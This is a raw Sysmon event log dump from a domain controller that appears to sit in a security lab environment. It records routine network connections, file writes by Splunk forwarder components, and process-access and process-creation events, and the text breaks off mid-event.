AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local60640-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local389ldap 354300x80000000000000002202509Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:01.469{5ABCFE62-842F-603E-0F00-00000000AD01}296C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local60640-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local389ldap 354300x80000000000000002202508Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:01.469{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local60639-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local49666- 354300x80000000000000002202507Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:01.469{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local60639-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local49666- 354300x80000000000000002202506Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:01.468{5ABCFE62-842F-603E-0D00-00000000AD01}912C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local60638-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local135epmap 354300x80000000000000002202505Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:01.468{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local60638-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local135epmap 354300x80000000000000002202504Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:01.419{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local60673- 23542300x80000000000000002202503Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:04.724{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3FAA8C3D74EDCC979801A2D09E53E92,SHA256=BA43C41200502C3C1B4EE95627F9422F3499B7A9A3F34922200A4B0B5FC18F9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202502Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:04.584{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2997B030ACFC71AEDE56BB7C79B9E76D,SHA256=C3510091B99E493F54B5E88B327A72037A296808F91519C01207D3DFBBFBBF15,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202501Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:59.045{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60637-false10.0.1.12-8000- 23542300x80000000000000002202514Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:05.740{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A4C0C3A7AB62ECC2EF5210682DA7B23,SHA256=C4E00BD5B4E7890BC832FB3C654C81241A48440BD30EF961502478129D093729,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202513Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:05.615{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=03BB0FA0177CA442B251B0CC14718E65,SHA256=8D8F3041ABF4C7442FCA9E4795D276EF3843A67339470479CDAF78D328D47A3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202522Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:06.896{5ABCFE62-84A2-603E-A500-00000000AD01}2876NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=78FFC68B55788172C6F01776E1175A4A,SHA256=7EFF8D2B790A6CE455B9D8C44CE8A2AF78181139506EC2EC15800E71AC1D548F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202521Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:06.755{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29C7DA04D6288D86D9DA371368462C3A,SHA256=1F5DB075BE124BFF1D80591BBBFA5A5571695D3096960CE519CA160C2A083545,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202520Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:01.582{5ABCFE62-8423-603E-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local60644-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local445microsoft-ds 354300x80000000000000002202519Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:01.582{5ABCFE62-8423-603E-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local60644-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local445microsoft-ds 354300x80000000000000002202518Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:01.580{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local60643-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local49666- 354300x80000000000000002202517Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:01.580{5ABCFE62-842F-603E-1500-00000000AD01}1104C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local60643-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local49666- 354300x80000000000000002202516Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:01.579{5ABCFE62-842F-603E-0D00-00000000AD01}912C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local60642-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local135epmap 354300x80000000000000002202515Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:01.579{5ABCFE62-842F-603E-1500-00000000AD01}1104C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local60642-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local135epmap 23542300x80000000000000002202525Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:07.974{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=438D4F2A12C3B9B47DB9F643CC2F8883,SHA256=B1F2A999A127565351C10D2561AAEDAB60966278F1A91704D7D919B2159C7C69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202524Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:07.771{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E21526FB98F515034F503FF9FDD5D057,SHA256=3186946839229F507C72EE603A6256A0B84578E402B7FDEA85C45062A83DDED8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202523Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:02.435{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-60673- 354300x80000000000000002202528Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:04.873{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60646-false10.0.1.12-8000- 354300x80000000000000002202527Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:04.732{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60645-false10.0.1.12-8089- 23542300x80000000000000002202526Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:08.771{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E20B09F8F7F73ADF3D28A190679E9B9,SHA256=105DFB528F5A2B0C1412AD7F222510F75C7BF2891B6698F85FC046EB15B26A77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202529Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:09.787{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95291BBBFEA84F06271922A999616AEB,SHA256=14D807ACD51234CFF4953691BD0EB28CDC6A8B64C0BD72D4E30F7D485E6F9641,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202530Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:10.802{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4078155044025E97632CB1486337C5EF,SHA256=B796E273EFFE3A3D62115637E8DAB6EE871C368EA9A6434DD450E4CD1ABE2C34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202531Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:11.802{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCEB0D0C2FB8EC27C4E4B8B51E2B62AD,SHA256=FE88753EF8AC2419E8DE9EA9851AAF9304CD50E158527DF26ECE8C5D42020778,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202533Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:12.818{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73329F0FFC4C7213D9FB8583631D52E5,SHA256=9EC3908B64F877B026B32C6248233AEFEFAB033B3530EC8986B8FD458348DF07,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202532Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:12.677{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4822FC86CA872700C204AE785E1812F8,SHA256=BDD9333FF79A0E67A823C4A3565216C95FB9BBBFCF0069D06DA83AA5570A579C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202534Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:13.833{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AD9A4AF859802AD7E95652E6373592F,SHA256=00CF5374254DACC7E1D96F72800EBEF9D1FB70F91EF7BF2C4F2C2D1ABA798D7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202536Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:14.849{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C20AB0EF9C4D5CD26FFD82804584F41,SHA256=DF5B8870E777689B7E6CC9EDA6D3805EB53486C4622FCFB806B683802C17CBF0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202535Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:09.888{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60647-false10.0.1.12-8000- 23542300x80000000000000002202538Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:15.865{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B687F1BFE13751BB8D4539F9D22D9765,SHA256=D96FB4FE1BADC665E333253AB6AE242B2A8B0CD8D5CC1FA4952E5FCCBDC0E9F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202537Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:15.771{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A0B7902BC4F99DBFA043CE2DA5B8C0B5,SHA256=6A1BAB3A5392AA168751E2F056490F0CDEA170103C6077E86E7D22E6AB12E610,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202539Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:16.865{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40B01CBB7307E3EF0CB21200B2796557,SHA256=E7522A297818014E37C40F35F2A72434225534DD0CF397A7F32C6480F6B7994F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202550Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:17.866{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC0C6313D11CD20F18D8E2D1BA00B838,SHA256=F158119F634D62046814F40D7C2E78CE495694D9143EB4E8134FBE1F3A0AA332,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202549Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:17.740{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B67EE924F42A0FF2EE8F142806C1D3BE,SHA256=E4A826FEEE48C706F8A6D06F9F6EDEF6C84B02EF7944D3042BEA8907CA346CD0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002202548Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:17.568{5ABCFE62-E8E1-6040-284E-00000000AD01}62326116C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202547Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:17.427{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E8E1-6040-284E-00000000AD01}6232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202546Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:17.427{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202545Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:17.427{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202544Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:17.427{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202543Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:17.427{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202542Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:17.427{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E8E1-6040-284E-00000000AD01}6232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002202541Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:17.427{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E8E1-6040-284E-00000000AD01}6232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002202540Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:17.428{5ABCFE62-E8E1-6040-284E-00000000AD01}6232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002202568Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:18.897{5ABCFE62-E8E2-6040-2A4E-00000000AD01}38565800C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program 